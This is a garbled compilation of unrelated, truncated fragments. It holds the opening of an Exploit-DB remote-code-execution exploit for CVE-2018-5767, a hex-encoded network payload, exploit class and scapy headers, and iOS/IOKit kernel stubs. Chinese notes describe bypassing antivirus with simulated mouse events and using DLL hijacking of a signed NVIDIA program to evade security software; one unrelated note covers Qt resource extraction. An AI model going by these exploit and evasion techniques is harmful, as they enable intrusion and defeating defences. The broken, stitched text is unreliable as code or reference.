#!/usr/bin/env python# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/import urllib2import structimport timeimport socketfrom optparse import *import SimpleHTTPServerimport SocketServerimport threadingimport sysim

########################################### import SocketServer from binascii import unhexlify payload = '000000ecfd534d424141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

 #import "AppDelegate.h"   #include <mach/mach.h>   extern kern_return_t bootstrap_look_up(mach_port_t bs, const char *service_name, mach_port_t *service);  

前几天一直在想着怎么绕过AV,主动防御,各种杀软。费尽周折在FreeBuf看到了一篇这样的文章是关于通过操作鼠标绕过AV的。 以下是FreeBuf原文http://www.freebuf.com/articles/system/135708.html说干就干,核心就是 mouse_event();

Qt是一个跨平台的GUI开发库，集成了对应平台的API的库      前几天由于项目跨平台需求，我对Linux的库又不熟悉，于是打算利用Qt的跨平台的特性进行开发，项目中需要释放资源，从而减少网络下载。      于是我发现QResource中并没有关于释放资源文件的函数，由于QFile中可以直接获取资源URL，于是打算用QIO读取出QFile的数据，但是发现并不行。读取的数据不是读取不完整就是坏数据或者崩溃。   

from sys import exitfrom requests import postfrom argparse import ArgumentParserfrom random import choicefrom string import ascii_uppercase, ascii_lowercase, digitsfrom xml.sax.saxutils import escape  class Exploit:    &

 from scapy.all import * from time import sleep from struct import pack, unpack import random import argparse import sys from termcolor import colored  

        DLL劫持，利用主文件带有数字签名，DLL可自定义内容的特性，经常被不发分子用于绕过安全防护软件        不过随着安全防护技术的进一步提高，这种方法现在更难以被利用于非法行为。        这里我们用英伟达驱动显卡管理目录下的一个应用程序作演示.  &nb

#include <stdio.h>#include <stdlib.h>#include <string.h>  #include <IOKit/IOKitLib.h>  int main(int argc, char** argv){  kern_return_t err;    io_service_t service = IOServiceG

using System;using System.IO;  class MainClass {   static void Main(string[] args) {      if (args.Length < 1) {        Console.WriteLine("Specify